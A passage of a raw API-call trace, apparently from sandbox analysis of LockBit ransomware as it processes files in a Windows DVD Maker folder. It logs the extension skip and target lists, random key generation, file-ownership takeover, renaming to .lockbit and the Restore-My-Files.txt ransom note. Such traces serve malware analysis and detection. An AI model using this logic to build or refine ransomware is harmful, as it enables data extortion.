dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.945] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.945] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.945] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4815) returned 1 [0087.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0087.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0087.946] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.956] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.957] malloc (_Size=0xee) returned 0x1ff1e60 [0087.957] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xee, FileInformationClass=0xa) returned 0xc0000008 [0087.957] free (_Block=0x1ff1e60) [0087.957] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.957] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.957] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.957] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5c3c91, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5c3c91, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpecialNavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0087.957] lstrcmpiW (lpString1=".", lpString2="SpecialNavigationLeft_SelectionSubpicture.png") returned -1 [0087.957] lstrcmpiW (lpString1="..", lpString2="SpecialNavigationLeft_SelectionSubpicture.png") returned -1 [0087.957] PathFindExtensionW (pszPath="SpecialNavigationLeft_SelectionSubpicture.png") returned=".png" [0087.957] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.957] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.957] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.957] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.957] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.957] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.957] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.957] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.958] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.958] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.958] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.958] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.958] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.958] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.959] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.959] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.959] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.959] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.959] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.959] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SpecialNavigationLeft_SelectionSubpicture.png") returned -1 [0087.959] lstrcmpiW (lpString1="ntldr", lpString2="SpecialNavigationLeft_SelectionSubpicture.png") returned -1 [0087.960] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SpecialNavigationLeft_SelectionSubpicture.png") returned -1 [0087.960] lstrcmpiW (lpString1="bootsect.bak", lpString2="SpecialNavigationLeft_SelectionSubpicture.png") returned -1 [0087.960] lstrcmpiW (lpString1="autorun.inf", lpString2="SpecialNavigationLeft_SelectionSubpicture.png") returned -1 [0087.960] lstrcmpiW (lpString1="thumbs.db", lpString2="SpecialNavigationLeft_SelectionSubpicture.png") returned 1 [0087.960] lstrcmpiW (lpString1="iconcache.db", lpString2="SpecialNavigationLeft_SelectionSubpicture.png") returned -1 [0087.960] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.960] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png") returned=".png" [0087.960] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.960] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.960] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.960] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.961] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.961] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.961] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.961] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.961] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.961] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.961] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.961] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.961] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.961] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.961] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.961] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png.lockbit") returned 114 [0087.961] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.962] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.963] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.963] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.963] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.963] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.963] RtlFreeAnsiString (AnsiString="\\") [0087.963] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0087.963] malloc (_Size=0x200) returned 0x77d800 [0087.963] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.964] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.964] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.964] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.964] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.965] CloseHandle (hObject=0x3c4) returned 1 [0087.965] free (_Block=0x77d800) [0087.965] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.965] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.965] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.965] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3030) returned 1 [0087.965] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0087.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0087.966] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.976] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.977] malloc (_Size=0xfa) returned 0x1ff1e60 [0087.977] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xfa, FileInformationClass=0xa) returned 0xc0000008 [0087.977] free (_Block=0x1ff1e60) [0087.977] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.977] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.977] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.977] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f59db34, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f59db34, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpecialNavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0087.977] lstrcmpiW (lpString1=".", lpString2="SpecialNavigationRight_ButtonGraphic.png") returned -1 [0087.977] lstrcmpiW (lpString1="..", lpString2="SpecialNavigationRight_ButtonGraphic.png") returned -1 [0087.977] PathFindExtensionW (pszPath="SpecialNavigationRight_ButtonGraphic.png") returned=".png" [0087.977] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.977] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.978] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.978] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.978] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.978] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.979] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.979] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.979] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.979] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.979] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.979] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.979] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.979] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.980] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SpecialNavigationRight_ButtonGraphic.png") returned -1 [0087.980] lstrcmpiW (lpString1="ntldr", lpString2="SpecialNavigationRight_ButtonGraphic.png") returned -1 [0087.980] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SpecialNavigationRight_ButtonGraphic.png") returned -1 [0087.980] lstrcmpiW (lpString1="bootsect.bak", lpString2="SpecialNavigationRight_ButtonGraphic.png") returned -1 [0087.980] lstrcmpiW (lpString1="autorun.inf", lpString2="SpecialNavigationRight_ButtonGraphic.png") returned -1 [0087.980] lstrcmpiW (lpString1="thumbs.db", lpString2="SpecialNavigationRight_ButtonGraphic.png") returned 1 [0087.980] lstrcmpiW (lpString1="iconcache.db", lpString2="SpecialNavigationRight_ButtonGraphic.png") returned -1 [0087.980] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.980] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png") returned=".png" [0087.980] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.980] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.980] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.980] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.981] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.981] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.981] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.981] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.981] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.981] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.981] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.981] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.981] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png.lockbit") returned 109 [0087.981] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.982] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.982] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.982] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.983] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.983] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.983] RtlFreeAnsiString (AnsiString="\\") [0087.983] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0087.983] malloc (_Size=0x200) returned 0x77d800 [0087.983] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.983] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.983] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.983] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.984] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.984] CloseHandle (hObject=0x3c4) returned 1 [0087.984] free (_Block=0x77d800) [0087.984] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.985] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.985] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.985] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4815) returned 1 [0087.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: 